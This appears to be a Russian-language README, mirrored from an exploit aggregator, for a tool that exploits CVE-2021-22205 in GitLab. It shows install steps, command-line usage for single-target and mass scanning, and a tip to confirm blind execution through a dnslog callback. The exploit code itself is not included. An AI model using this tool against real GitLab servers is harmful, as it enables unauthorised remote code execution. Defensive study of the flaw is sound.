## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-JEROMEYOUNG-CVE-2021-22210
## 0x01 Предисловие
**Заявление: Данный проект предназначен только для обучения и обмена, не используйте для нелегального неавторизованного тестирования!**
**История обновлений**
10.30
* Добавлен пул прокси `burp`
* Переписаны аргументы командной строки
* Добавлена функция неавторизованного массового и одиночного обнаружения `gitlab`
## 0x02 Инструкция по использованию
Установка
root@kitploit:~
pip3 install - r requirements.txt
Использование
root@kitploit:~
usage: CVE-2021-22205.py [-h] [-w WAY] [-u URL] [-f FILE]
CVE-2021-22205
optional arguments:
-h, --help show this help message and exit
-w WAY, --way WAY Exploit way Forexample unauthorized or register new projects
-u URL, --url URL url like http://127.0.0.1:8080
-f FILE, --file FILE url file path
Обнаружение неавторизованной загрузки для одного `url`
root@kitploit:~
python3 CVE-2021-22205.py -w un -u http://127.0.0.1
Массовое обнаружение неавторизованной загрузки
root@kitploit:~
python3 CVE-2021-22205.py -w un -f ./url.txt
Небольшой пример
Эта уязвимость по умолчанию не выводит результат, введите команду, например, используя `dnslog` для проверки по данным

Вернитесь на `dnslog` для проверки, если есть ответ — успех

## Ссылки
https://hackerone.com/reports/1154542
https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/
https://github.com/RedTeamWing/CVE-2021-22205
https://github.com/mr-r3bot/Gitlab-CVE-2021-22205/